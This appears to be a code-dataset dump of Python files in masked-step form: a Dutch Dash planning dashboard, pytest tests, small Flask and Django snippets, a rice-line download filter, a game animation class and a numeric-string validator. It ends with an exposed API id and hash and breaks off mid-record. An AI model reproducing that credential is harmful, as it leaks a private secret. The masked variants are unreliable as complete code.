dcc.Markdown('''Hieronder staan twee totaaloverzichten van de aankomende maanden.'''),\n dcc.Markdown('''De blauwe balk geeft de ingeplande uren weer. De streep geeft de beschikbare uren aan.'''),\n dcc.Markdown('''Het kleine getal eronder geeft aan hoeveel uren tekort/over zijn voor die maand.'''),\n html.Div(\n style=globals['styles']['divgraphs'],\n children=[\n dcc.Graph(\n figure=(data['graphdata']['gaugefig'])\n )\n ]\n )\n\n ]\n ),\n html.Div(\n className='maindivs',\n style=globals['styles']['maindivs'], \n children=[\n html.H4('Gantt'),\n dcc.Dropdown(\n style = globals['styles']['dropdowns'],\n id='dropdowngantttactisch',\n options=[{'label':j, 'value': i} for i,j in data['arrays']['threemonths']],\n multi=False,\n searchable=False,\n value = data['arrays']['threemonths'][0][0],\n ),\n html.Div(\n style=globals['styles']['divgraphs'],\n children=[\n dcc.Graph(id='gantttactisch'\n )\n \n ]\n )\n\n ]\n ),\n ]\n\n\n ),\n# dcc.Tab(\n# style=globals['styles']['tabs'], \n# label='Configuratie',\n# children=[\n# html.Div(\n# className='maindivs',\n# style=globals['styles']['maindivs'], \n# children=[\n# html.H3('Uitleg'),\n# dcc.Markdown('''Klik op de button hieronder om de huidige configuratie te downloaden.'''),\n# html.A(id='export_link', href='/dash/configuration/', children=[html.Button(id='export_button', type='button', children=['Export'])]),\n\n# dcc.Markdown('''Pas het bestand aan en upload deze hieronder.'''),\n# dcc.Upload(\n# id='configupload',\n# children=html.Div([\n# 'Sleep het bestand of ',\n# html.A('selecteer het bestand')\n\n# ]),\n# style=globals['styles']['divgraphs'],\n# multiple=False,\n\n# ),\n \n# html.Div(id='confirmupload',style=globals['styles']['divgraphs'])\n# ]\n# ), \n# ]\n\n\n# ) \n ]\n )\n ]\n )\n\n\n#---! gantttactisch\n@app.callback(Output('gantttactisch', 'figure'),\n [Input('dropdowngantttactisch','value')]\n\n)\n\ndef update_gantttactisch(v1):\n if v1 != None: \n if v1[4:] == '12':\n v1plus1 = str(int(v1[0:4])+1)+'01'\n else:\n v1plus1 = str(int(v1)+1)\n if v1[4:] == '01':\n v1min1 = str(int(v1[0:4])-1)+'12'\n else:\n v1min1 = str(int(v1)-1)\n if v1[4:] == '11':\n v1plus2 = str(int(v1[0:4])+1)+'01'\n else:\n v1plus2 = str(int(v1)+2)\n\n import random\n import numpy as np\n from operator import itemgetter\n ganttdata= []\n monthkey = int(v1)\n for i,j in data['kaarten'].items():\n if j['Status'] in ['Niet gestart', 'Doing', 'Blocked']:\n try:\n if int(datetime.strftime(j['Begindatum'], '%Y%m')) <= monthkey and int(datetime.strftime(j['Einddatum'], '%Y%m')) >= monthkey:\n if j['Begindatum'].date() < datetime.strptime(v1min1+'01','%Y%m%d').date():\n start=datetime.strptime(v1min1+'01','%Y%m%d').date()\n else:\n start = j['Begindatum'].date()\n if j['Einddatum'].date() >= datetime.strptime(v1plus2+'01','%Y%m%d').date():\n eind=datetime.strptime(v1plus2+'01','%Y%m%d').date()\n else:\n eind = j['Einddatum'].date()\n ganttdata.append(dict(Task=j['Epic'],\n Start=start,\n Finish=eind,\n Resource=j['Naam'] + ' (uren: ' + str(round(data['urenperdagperkaart'][j['Naam']]['urenperperiode'][v1])) + ')'\n ))\n except:\n pass\n result = sorted(ganttdata, key=itemgetter('Task'))\n rgb = []\n for c in range(len(result)):\n r = list(np.random.choice(range(256), size=3))\n s2 = ','.join(map(str,r))\n s1 = \"rgb(\"\n s3 = \")\"\n rgb.append(s1 + s2 + s3) \n fig = ff.create_gantt(result, index_col='Resource', show_colorbar=True, group_tasks=False, showgrid_x=True, showgrid_y=True, colors=rgb)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', \n plot_bgcolor='rgba(0,0,0,0)',)\n\n fig.add_trace(go.Scatter(mode='lines', x=[v1[0:4]+'-'+v1[4:]+'-01',v1[0:4]+'-'+v1[4:]+'-01'],y=[-1,len(result)], line={'shape': 'spline', 'color': 'black', 'width': 4}, showlegend=False))\n fig.add_trace(go.Scatter(mode='lines', x=[v1plus1[0:4]+'-'+v1plus1[4:]+'-01',v1plus1[0:4]+'-'+v1plus1[4:]+'-01'],y=[-1,len(result)], line={'shape': 'spline', 'color': 'black', 'width': 4}, showlegend=False))\n return fig \n else:\n return {'data': [go.Pie()],'layout': go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n\n\n# #---! configupload\n# @app.callback(Output('confirmupload', 'children'),\n# [Input('configupload','contents')]\n\n# )\n# def confirm_upload(contents):\n# global newconfig\n# if contents is not None:\n# try:\n# newconfig = json.loads(base64.b64decode(contents[23:]).decode('ASCII'))\n# d = {}\n# for key,value in newconfig.items():\n# if type(value) == list:\n# d[key] = ''\n# for i in value:\n# if d[key] == '':\n# d[key] += i \n# else:\n# if i == value[-1]:\n# d[key] += (', '+i)\n# else:\n# d[key] = value\n\n# return html.Div(\n# id='returneddiv',\n# style=globals['styles']['divgraphs'],\n# children=[ \n# dcc.Markdown('''Check hieronder of de juiste data is ingevoerd. Klik daarna daaronder op 'Opslaan'.'''),\n# dash_table.DataTable(\n# style_header={'backgroundColor': 'rgba(62,182,235,0.6)','color': 'black', 'fontWeight': 'bold', 'fontFamily': 'Arial'},\n# style_cell = {'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black','text-align': 'left', 'fontFamily': 'Arial'}, \n# columns=[{'name': 'Sleutel', 'id': 'Sleutel'}, {'name': 'Waarde', 'id': 'Waarde'}],\n# data=[{'Sleutel': key, 'Waarde': value} for key, value in d.items()]\n\n# ),\n# html.Button(\n# 'Opslaan',\n# id='save_button', \n# n_clicks=0\n# ),\n# html.Div(\n# id='savedornot',\n \n# )\n# ]\n# )\n# except:\n# return html.H5('Het bestand is incorrect. Download en upload opnieuw!')\n\n# else:\n# return\n\n\n# #---! save-button\n# @app.callback(Output('savedornot','children'),\n# [Input('save_button','n_clicks'),])\n# def save_fnct(n_clicks):\n# if n_clicks > 0:\n# with open('./configuration/configuration.txt','w') as outfile:\n# json.dump(newconfig, outfile, indent=4, sort_keys=True)\n# return 'Opgeslagen. Refresh de page.'\n# else:\n# return \n\n\n#---! ganttpersoon \n@app.callback(Output('ganttpersoon','figure'),\n [Input('dropdownganttpersoon','value'),\n Input('dropdownganttpersoonstatus', 'value')])\ndef update_ganttpersoon(v1, v2):\n ganttdata = []\n for i,j in data['kaarten'].items():\n if j[config.get('Custom Field for Person')] == v1 and j['Status'] != 'Archived' and j['Status'] in v2:\n try:\n ganttdata.append(dict(Task=j['Naam'],\n Start=j[config.get('Custom Field for Starting date')].date(),\n Finish = j[config.get('Custom Field for Ending date')].date(),\n Resource=j['Epic']\n ))\n except:\n pass\n if ganttdata != []:\n fig = ff.create_gantt(ganttdata, index_col='Resource', show_colorbar=True, showgrid_x=True, showgrid_y=True)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', \n plot_bgcolor='rgba(0,0,0,0)',)\n return fig \n else:\n return {'data': [go.Pie()],'layout': go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n \n\n\n\n#---! ganttepics\n@app.callback(Output('ganttepics','figure'),\n [Input('dropdownganttepics','value')])\ndef update_ganttepics(value):\n ganttdata = []\n for i,j in data['kaarten'].items():\n if j['Epic'] == value and j['Status'] != 'Archived':\n try:\n ganttdata.append(dict(Task=j['Naam'],\n Start=j[config.get('Custom Field for Starting date')].date(),\n Finish = j[config.get('Custom Field for Ending date')].date(),\n Resource=j['Status']\n ))\n except:\n pass\n if ganttdata != []:\n fig = ff.create_gantt(ganttdata, index_col='Resource', show_colorbar=True, showgrid_x=True, showgrid_y=True)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', \n plot_bgcolor='rgba(0,0,0,0)',)\n return fig \n else:\n return {'data': [go.Pie()],'layout': go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n \n\n#---! urenpermaand callback\n@app.callback(Output('urenpermaand', 'figure'),\n [Input('dropdownurenpermaand', 'value')]\n )\ndef update_urenpermaand(value):\n layout = go.Layout(paper_bgcolor='rgba(0,0,0,0)', \n plot_bgcolor='rgba(0,0,0,0)',\n xaxis={'title': 'Datum', 'gridcolor': 'gray'},\n yaxis={'title': 'Ingeplande uren', 'gridcolor': 'gray'})\n bars = []\n if 'Regulier werk' in value:\n yaxis = []\n for i in data['arrays']['perioden']:\n yaxis.append(round(sum([value['urenperperiode'][i] for value in data['urenperdagperkaart'].values() if value[config.get('Custom Field for Categories')] == 'Regulier werk']),0))\n bars.append(dict(x=data['arrays']['xaxis_months'],\n y=yaxis,\n name='Regulier werk',\n line = {'shape': 'spline', 'smoothing': 0.4},\n mode='lines+markers',\n marker= {'symbol': 'triangle-up-open', 'size': 10},\n stackgroup='one', \n ))\n \n \n for categorie in data['arrays'][config.get('Custom Field for Categories')]:\n if categorie in value and categorie != 'Regulier werk':\n if categorie == None:\n categorienaam = 'Geen categorie'\n else:\n categorienaam = categorie\n yaxis = []\n for i in data['arrays']['perioden']:\n yaxis.append(round(sum([value['urenperperiode'][i] for value in data['urenperdagperkaart'].values() if value[config.get('Custom Field for Categories')] == categorie]),0))\n bars.append(dict(x=data['arrays']['xaxis_months'],\n y=yaxis,\n name=categorienaam,\n line = {'shape': 'spline', 'smoothing': 0.4},\n mode='lines+markers',\n marker= {'symbol': 'triangle-up-open', 'size': 10},\n stackgroup='one', \n ))\n yaxis = []\n for i in data['arrays']['perioden']:\n yaxis.append(round(sum([value['urenperperiode'][i] for value in data['beschikbareuren'].values()]),0))\n bars.append(dict(name='Totaal beschikbare uren',\n mode = 'lines',\n x = data['arrays']['xaxis_months'],\n y = yaxis,\n size=10,\n line = {'shape': 'spline', 'smoothing': 0.3, 'width':6, 'color': 'black'},\n \n )) \n \n \n \n return {\n 'data': bars,\n 'layout': layout}\n\n#--! App routes\n\n@app.server.route(\"/dash/configuration/\")\ndef download_file():\n\n return flask.send_file('./configuration/configuration.txt',\n attachment_filename=\"configuration.txt\",\n as_attachment=True,\n cache_timeout=0\n )\n\n\n\n\n\n\n\n#--! Check if this is the main app and if so, run Dash!\nif __name__ == '__main__':\n app.run_server(debug=False,host='0.0.0.0', port=8050)\n \n",
"step-ids": [
2,
8,
10,
11,
12
]
}
|
[
2,
8,
10,
11,
12
] |
class TestContext:
def test_should_get_variable_from_env(self, monkeypatch, fake_context):
expected = "test"
monkeypatch.setenv("SOURCE_PATH", expected)
actual = fake_context.get("SOURCE_PATH")
assert actual == expected
def test_should_get_variable_from_local_state(self, fake_context):
expected = "test"
fake_context.set({"SOURCE_PATH": expected})
actual = fake_context.get("SOURCE_PATH")
assert actual == expected
def test_should_set_variable_to_local_state(self, fake_context):
expected = "test"
fake_context.set({"test": expected})
actual = fake_context.get("test")
assert actual == expected
|
normal
|
{
"blob_id": "e83a9a4675e5beed938860037658d33c4d347b29",
"index": 8528,
"step-1": "class TestContext:\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "class TestContext:\n <mask token>\n\n def test_should_get_variable_from_local_state(self, fake_context):\n expected = 'test'\n fake_context.set({'SOURCE_PATH': expected})\n actual = fake_context.get('SOURCE_PATH')\n assert actual == expected\n <mask token>\n",
"step-3": "class TestContext:\n\n def test_should_get_variable_from_env(self, monkeypatch, fake_context):\n expected = 'test'\n monkeypatch.setenv('SOURCE_PATH', expected)\n actual = fake_context.get('SOURCE_PATH')\n assert actual == expected\n\n def test_should_get_variable_from_local_state(self, fake_context):\n expected = 'test'\n fake_context.set({'SOURCE_PATH': expected})\n actual = fake_context.get('SOURCE_PATH')\n assert actual == expected\n <mask token>\n",
"step-4": "class TestContext:\n\n def test_should_get_variable_from_env(self, monkeypatch, fake_context):\n expected = 'test'\n monkeypatch.setenv('SOURCE_PATH', expected)\n actual = fake_context.get('SOURCE_PATH')\n assert actual == expected\n\n def test_should_get_variable_from_local_state(self, fake_context):\n expected = 'test'\n fake_context.set({'SOURCE_PATH': expected})\n actual = fake_context.get('SOURCE_PATH')\n assert actual == expected\n\n def test_should_set_variable_to_local_state(self, fake_context):\n expected = 'test'\n fake_context.set({'test': expected})\n actual = fake_context.get('test')\n assert actual == expected\n",
"step-5": "class TestContext:\n def test_should_get_variable_from_env(self, monkeypatch, fake_context):\n expected = \"test\"\n monkeypatch.setenv(\"SOURCE_PATH\", expected)\n actual = fake_context.get(\"SOURCE_PATH\")\n assert actual == expected\n\n def test_should_get_variable_from_local_state(self, fake_context):\n expected = \"test\"\n fake_context.set({\"SOURCE_PATH\": expected})\n actual = fake_context.get(\"SOURCE_PATH\")\n assert actual == expected\n\n def test_should_set_variable_to_local_state(self, fake_context):\n expected = \"test\"\n fake_context.set({\"test\": expected})\n actual = fake_context.get(\"test\")\n assert actual == expected\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
@micro_service.route('/')
def home():
return jsonify({'message': 'Hello, world!'})
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@micro_service.route('/')
def home():
return jsonify({'message': 'Hello, world!'})
if __name__ == '__main__':
micro_service.run()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
micro_service = Flask(__name__)
@micro_service.route('/')
def home():
return jsonify({'message': 'Hello, world!'})
if __name__ == '__main__':
micro_service.run()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from flask import Flask
from flask import jsonify
micro_service = Flask(__name__)
@micro_service.route('/')
def home():
return jsonify({'message': 'Hello, world!'})
if __name__ == '__main__':
micro_service.run()
<|reserved_special_token_1|>
"""
Creating flask server that response with a json
"""
from flask import Flask
from flask import jsonify
micro_service = Flask(__name__)
@micro_service.route('/') # http://mysite.com/
def home():
return jsonify({'message': 'Hello, world!'})
if __name__ == '__main__':
micro_service.run()
|
flexible
|
{
"blob_id": "4b14dee3625d5d0c703176ed2f0a28b2583fd84d",
"index": 6519,
"step-1": "<mask token>\n\n\n@micro_service.route('/')\ndef home():\n return jsonify({'message': 'Hello, world!'})\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@micro_service.route('/')\ndef home():\n return jsonify({'message': 'Hello, world!'})\n\n\nif __name__ == '__main__':\n micro_service.run()\n",
"step-3": "<mask token>\nmicro_service = Flask(__name__)\n\n\n@micro_service.route('/')\ndef home():\n return jsonify({'message': 'Hello, world!'})\n\n\nif __name__ == '__main__':\n micro_service.run()\n",
"step-4": "<mask token>\nfrom flask import Flask\nfrom flask import jsonify\nmicro_service = Flask(__name__)\n\n\n@micro_service.route('/')\ndef home():\n return jsonify({'message': 'Hello, world!'})\n\n\nif __name__ == '__main__':\n micro_service.run()\n",
"step-5": "\"\"\"\nCreating flask server that response with a json\n\"\"\"\n\nfrom flask import Flask\nfrom flask import jsonify\n\nmicro_service = Flask(__name__)\n\n\n@micro_service.route('/') # http://mysite.com/\ndef home():\n return jsonify({'message': 'Hello, world!'})\n\n\nif __name__ == '__main__':\n micro_service.run()\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
urlpatterns = [path('', home_vacancies_view, name='vacancy-home'), path(
'list/', vacancies_view, name='vacancy')]
<|reserved_special_token_1|>
from django.urls import path
from jobscrapper.views import *
urlpatterns = [path('', home_vacancies_view, name='vacancy-home'), path(
'list/', vacancies_view, name='vacancy')]
<|reserved_special_token_1|>
from django.urls import path
from jobscrapper.views import *
urlpatterns = [
path('', home_vacancies_view, name="vacancy-home"),
path('list/', vacancies_view, name="vacancy"),
]
|
flexible
|
{
"blob_id": "3ee20391d56d8c429ab1bd2f6b0e5b261721e401",
"index": 7965,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('', home_vacancies_view, name='vacancy-home'), path(\n 'list/', vacancies_view, name='vacancy')]\n",
"step-3": "from django.urls import path\nfrom jobscrapper.views import *\nurlpatterns = [path('', home_vacancies_view, name='vacancy-home'), path(\n 'list/', vacancies_view, name='vacancy')]\n",
"step-4": "from django.urls import path\nfrom jobscrapper.views import *\n\nurlpatterns = [\n path('', home_vacancies_view, name=\"vacancy-home\"),\n path('list/', vacancies_view, name=\"vacancy\"),\n\n]",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/opt/Python/2.7.3/bin/python
import sys
from collections import defaultdict
import numpy as np
import re
import os
import argparse
from Bio import SeqIO
def usage():
test="name"
message='''
python CircosConf.py --input circos.config --output pipe.conf
'''
print message
def fasta_id(fastafile):
fastaid = defaultdict(str)
for record in SeqIO.parse(fastafile,"fasta"):
fastaid[record.id] = 1
return fastaid
#temperate.mPing.group.id
def readtable(infile):
data = defaultdict(str)
with open (infile, 'r') as filehd:
for line in filehd:
line = line.rstrip()
if len(line) > 2:
unit = re.split(r'\t',line)
if not data.has_key(unit[0]):
data[unit[0]] = 1
return data
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input')
parser.add_argument('-o', '--output')
parser.add_argument('-v', dest='verbose', action='store_true')
args = parser.parse_args()
try:
len(args.input) > 0
except:
usage()
sys.exit(2)
unique_id = readtable(args.input)
#1 IRIS313-15896 Colombia Indica ERS467753 anonftp@ftp.ncbi.nlm.nih.gov:/sra/sra-instant/reads/ByRun/sra/ERR/ERR626/ERR626447/ERR626447.sra
infile = '../GigaScience/rice_line_IRRI_2466.download.list'
count = 0
other_id = defaultdict(lambda : int())
total_id = defaultdict(lambda : int())
r = re.compile(r'Japonica', re.IGNORECASE)
ofiles = []
for i in range(7):
ofile = open('%s.other%s.download.list' %(args.input, i), 'w')
ofiles.append(ofile)
with open (infile, 'r') as filehd:
for line in filehd:
line = line.rstrip()
if len(line) > 2:
unit = re.split(r'\t',line)
if not r.search(unit[3]):
continue
total_id[unit[1]] = 1
if not unique_id.has_key(unit[1]):
other_id[unit[1]] = 1
count = len(other_id.keys())
index = int(float(count)/100)
#print index, count, unit[1]
print >> ofiles[index], line
for i in range(7):
ofiles[i].close()
print 'high mping: %s (2 are not japonica in this group)' %(len(unique_id.keys()))
print 'other: %s' %(count)
print 'total: %s' %(len(total_id.keys()))
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "fe0d6cc03512d54d2d8722551e3f2a7c1bf43997",
"index": 3581,
"step-1": "#!/opt/Python/2.7.3/bin/python\nimport sys\nfrom collections import defaultdict\nimport numpy as np\nimport re\nimport os\nimport argparse\nfrom Bio import SeqIO\n\ndef usage():\n test=\"name\"\n message='''\npython CircosConf.py --input circos.config --output pipe.conf\n\n '''\n print message\n\ndef fasta_id(fastafile):\n fastaid = defaultdict(str)\n for record in SeqIO.parse(fastafile,\"fasta\"):\n fastaid[record.id] = 1\n return fastaid\n\n\n#temperate.mPing.group.id\ndef readtable(infile):\n data = defaultdict(str)\n with open (infile, 'r') as filehd:\n for line in filehd:\n line = line.rstrip()\n if len(line) > 2: \n unit = re.split(r'\\t',line)\n if not data.has_key(unit[0]):\n data[unit[0]] = 1\n return data\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input')\n parser.add_argument('-o', '--output')\n parser.add_argument('-v', dest='verbose', action='store_true')\n args = parser.parse_args()\n try:\n len(args.input) > 0\n except:\n usage()\n sys.exit(2)\n\n unique_id = readtable(args.input)\n #1 IRIS313-15896 Colombia Indica ERS467753 anonftp@ftp.ncbi.nlm.nih.gov:/sra/sra-instant/reads/ByRun/sra/ERR/ERR626/ERR626447/ERR626447.sra\n infile = '../GigaScience/rice_line_IRRI_2466.download.list'\n count = 0\n other_id = defaultdict(lambda : int())\n total_id = defaultdict(lambda : int())\n r = re.compile(r'Japonica', re.IGNORECASE)\n ofiles = []\n for i in range(7):\n ofile = open('%s.other%s.download.list' %(args.input, i), 'w')\n ofiles.append(ofile)\n with open (infile, 'r') as filehd:\n for line in filehd:\n line = line.rstrip()\n if len(line) > 2:\n unit = re.split(r'\\t',line)\n if not r.search(unit[3]):\n continue\n total_id[unit[1]] = 1\n if not unique_id.has_key(unit[1]):\n other_id[unit[1]] = 1\n count = len(other_id.keys())\n index = int(float(count)/100)\n #print index, count, unit[1]\n print >> ofiles[index], line\n for i in range(7):\n ofiles[i].close()\n print 'high mping: %s (2 are not japonica in this group)' %(len(unique_id.keys()))\n print 'other: %s' %(count)\n print 'total: %s' %(len(total_id.keys()))\nif __name__ == '__main__':\n main()\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def isNumber(self, A):
while len(A) > 0 and A[0] == ' ':
A = A[1:]
A = A[::-1]
while len(A) > 0 and A[0] == ' ':
A = A[1:]
A = A[::-1]
if len(A) == 0:
return 0
for c in A:
if c not in [str(i) for i in range(10)] + ['.', 'e', '-', '+']:
return 0
if 'e' in A:
A = A.split('e')
if len(A) != 2:
return 0
return int(self.isnum(A[0], 0) and self.isnum(A[1], 1))
return int(self.isnum(A, 0))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def isNumber(self, A):
while len(A) > 0 and A[0] == ' ':
A = A[1:]
A = A[::-1]
while len(A) > 0 and A[0] == ' ':
A = A[1:]
A = A[::-1]
if len(A) == 0:
return 0
for c in A:
if c not in [str(i) for i in range(10)] + ['.', 'e', '-', '+']:
return 0
if 'e' in A:
A = A.split('e')
if len(A) != 2:
return 0
return int(self.isnum(A[0], 0) and self.isnum(A[1], 1))
return int(self.isnum(A, 0))
def isnum(self, A, i):
if A == '':
return False
if i == 1 or i == 0 and '.' not in A:
if A[0] in ['+', '-']:
A = A[1:]
if A == '':
return False
for c in A:
if c not in [str(i) for i in range(10)]:
return False
return True
A = A.split('.')
return (self.isnum(A[0], 1) or A[0] == '') and self.isnum(A[1], 1)
<|reserved_special_token_1|>
'''
Please Note:
Note: It is intended for some problems to be ambiguous. You should gather all requirements up front before implementing one.
Please think of all the corner cases and clarifications yourself.
Validate if a given string is numeric.
Examples:
1."0" => true
2." 0.1 " => true
3."abc" => false
4."1 a" => false
5."2e10" => true
Return 0 / 1 ( 0 for false, 1 for true ) for this problem
Clarify the question using “See Expected Output”
1.Is 1u ( which may be a representation for unsigned integers valid?
For this problem, no.
2.Is 0.1e10 valid?
Yes
3.-01.1e-10?
Yes
4.Hexadecimal numbers like 0xFF?
Not for the purpose of this problem
5. 3. (. not followed by a digit)?
No
6.Can exponent have decimal numbers? 3e0.1?
Not for this problem.
7.Is 1f ( floating point number with f as prefix ) valid?
Not for this problem.
8.How about 1000LL or 1000L ( C++ representation for long and long long numbers )?
Not for this problem.
9.How about integers preceded by 00 or 0? like 008?
Yes for this problem
'''
class Solution:
# @param A : string
# @return an integer
def isNumber(self, A):
while len(A)>0 and A[0]==' ':
A = A[1:]
A=A[::-1]
while len(A)>0 and A[0]==' ':
A = A[1:]
A=A[::-1]
if len(A)==0:
return 0
for c in A:
if c not in [str(i) for i in range(10)] + ['.', 'e', '-', '+']:
return 0
if 'e' in A:
A = A.split('e')
if len(A)!=2:
return 0
return int(self.isnum(A[0], 0) and self.isnum(A[1], 1))
return int(self.isnum(A, 0))
def isnum(self, A, i):
#print(A,i)
if A=='':
return False
if i == 1 or (i == 0 and '.' not in A):
if A[0] in ['+', '-']:
A = A[1:]
if A == '':
return False
for c in A:
if c not in [str(i) for i in range(10)]:
return False
return True
A = A.split('.')
return (self.isnum(A[0], 1) or A[0]=='') and self.isnum(A[1], 1)
|
flexible
|
{
"blob_id": "50be2cbdaec6ed76e5d9367c6a83222f9153db82",
"index": 7426,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def isNumber(self, A):\n while len(A) > 0 and A[0] == ' ':\n A = A[1:]\n A = A[::-1]\n while len(A) > 0 and A[0] == ' ':\n A = A[1:]\n A = A[::-1]\n if len(A) == 0:\n return 0\n for c in A:\n if c not in [str(i) for i in range(10)] + ['.', 'e', '-', '+']:\n return 0\n if 'e' in A:\n A = A.split('e')\n if len(A) != 2:\n return 0\n return int(self.isnum(A[0], 0) and self.isnum(A[1], 1))\n return int(self.isnum(A, 0))\n <mask token>\n",
"step-4": "<mask token>\n\n\nclass Solution:\n\n def isNumber(self, A):\n while len(A) > 0 and A[0] == ' ':\n A = A[1:]\n A = A[::-1]\n while len(A) > 0 and A[0] == ' ':\n A = A[1:]\n A = A[::-1]\n if len(A) == 0:\n return 0\n for c in A:\n if c not in [str(i) for i in range(10)] + ['.', 'e', '-', '+']:\n return 0\n if 'e' in A:\n A = A.split('e')\n if len(A) != 2:\n return 0\n return int(self.isnum(A[0], 0) and self.isnum(A[1], 1))\n return int(self.isnum(A, 0))\n\n def isnum(self, A, i):\n if A == '':\n return False\n if i == 1 or i == 0 and '.' not in A:\n if A[0] in ['+', '-']:\n A = A[1:]\n if A == '':\n return False\n for c in A:\n if c not in [str(i) for i in range(10)]:\n return False\n return True\n A = A.split('.')\n return (self.isnum(A[0], 1) or A[0] == '') and self.isnum(A[1], 1)\n",
"step-5": "'''\nPlease Note:\nNote: It is intended for some problems to be ambiguous. You should gather all requirements up front before implementing one.\n\nPlease think of all the corner cases and clarifications yourself.\n\nValidate if a given string is numeric.\n\nExamples:\n\n1.\"0\" => true\n2.\" 0.1 \" => true\n3.\"abc\" => false\n4.\"1 a\" => false\n5.\"2e10\" => true\nReturn 0 / 1 ( 0 for false, 1 for true ) for this problem\n\nClarify the question using “See Expected Output”\n\n1.Is 1u ( which may be a representation for unsigned integers valid?\nFor this problem, no.\n2.Is 0.1e10 valid?\nYes\n3.-01.1e-10?\nYes\n4.Hexadecimal numbers like 0xFF?\nNot for the purpose of this problem\n5. 3. (. not followed by a digit)?\nNo\n6.Can exponent have decimal numbers? 3e0.1?\nNot for this problem.\n7.Is 1f ( floating point number with f as prefix ) valid?\nNot for this problem.\n8.How about 1000LL or 1000L ( C++ representation for long and long long numbers )?\nNot for this problem.\n9.How about integers preceded by 00 or 0? like 008?\nYes for this problem\n'''\nclass Solution:\n # @param A : string\n # @return an integer\n def isNumber(self, A):\n while len(A)>0 and A[0]==' ':\n A = A[1:]\n A=A[::-1]\n while len(A)>0 and A[0]==' ':\n A = A[1:]\n A=A[::-1]\n if len(A)==0:\n return 0\n for c in A:\n if c not in [str(i) for i in range(10)] + ['.', 'e', '-', '+']:\n return 0\n if 'e' in A:\n A = A.split('e')\n if len(A)!=2:\n return 0\n return int(self.isnum(A[0], 0) and self.isnum(A[1], 1))\n return int(self.isnum(A, 0))\n \n def isnum(self, A, i):\n #print(A,i)\n if A=='':\n return False\n if i == 1 or (i == 0 and '.' not in A):\n if A[0] in ['+', '-']:\n A = A[1:]\n if A == '':\n return False\n for c in A:\n if c not in [str(i) for i in range(10)]:\n return False\n return True\n A = A.split('.')\n return (self.isnum(A[0], 1) or A[0]=='') and self.isnum(A[1], 1)\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Import other modules
from zelda_utilities.constants import *
# Helps establish the current frame for sprite animation/image changing
class Animation:
def __init__(self):
# Animation clock
self.next_frame = pygame.time.get_ticks()
# Starting frame
self.frame = 0
# ~12 frames/sec (1000ms // 12)
self.frame_time = 1000 // ANIMATION_RATE
def anim_sprite(self):
if pygame.time.get_ticks() > self.next_frame:
self.frame = (self.frame + 1) % (24 * ANIMATION_RATE) # reset > 20 sec
self.next_frame += self.frame_time
return self.frame
|
normal
|
{
"blob_id": "0b36bf9ac7887101be5503a0edce19e1111e5ca0",
"index": 6607,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Animation:\n\n def __init__(self):\n self.next_frame = pygame.time.get_ticks()\n self.frame = 0\n self.frame_time = 1000 // ANIMATION_RATE\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Animation:\n\n def __init__(self):\n self.next_frame = pygame.time.get_ticks()\n self.frame = 0\n self.frame_time = 1000 // ANIMATION_RATE\n\n def anim_sprite(self):\n if pygame.time.get_ticks() > self.next_frame:\n self.frame = (self.frame + 1) % (24 * ANIMATION_RATE)\n self.next_frame += self.frame_time\n return self.frame\n",
"step-4": "from zelda_utilities.constants import *\n\n\nclass Animation:\n\n def __init__(self):\n self.next_frame = pygame.time.get_ticks()\n self.frame = 0\n self.frame_time = 1000 // ANIMATION_RATE\n\n def anim_sprite(self):\n if pygame.time.get_ticks() > self.next_frame:\n self.frame = (self.frame + 1) % (24 * ANIMATION_RATE)\n self.next_frame += self.frame_time\n return self.frame\n",
"step-5": "# Import other modules\nfrom zelda_utilities.constants import *\n\n\n# Helps establish the current frame for sprite animation/image changing\nclass Animation:\n def __init__(self):\n # Animation clock\n self.next_frame = pygame.time.get_ticks()\n\n # Starting frame\n self.frame = 0\n\n # ~12 frames/sec (1000ms // 12)\n self.frame_time = 1000 // ANIMATION_RATE\n\n def anim_sprite(self):\n if pygame.time.get_ticks() > self.next_frame:\n self.frame = (self.frame + 1) % (24 * ANIMATION_RATE) # reset > 20 sec\n self.next_frame += self.frame_time\n return self.frame\n\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
api_id = "2168275"
api_hash = "e011a9cb95b7e7e153aa5840985fc883"
|
normal
|
{
"blob_id": "c6d6fcc242e1b63104a3f3eb788880635257ff4c",
"index": 7503,
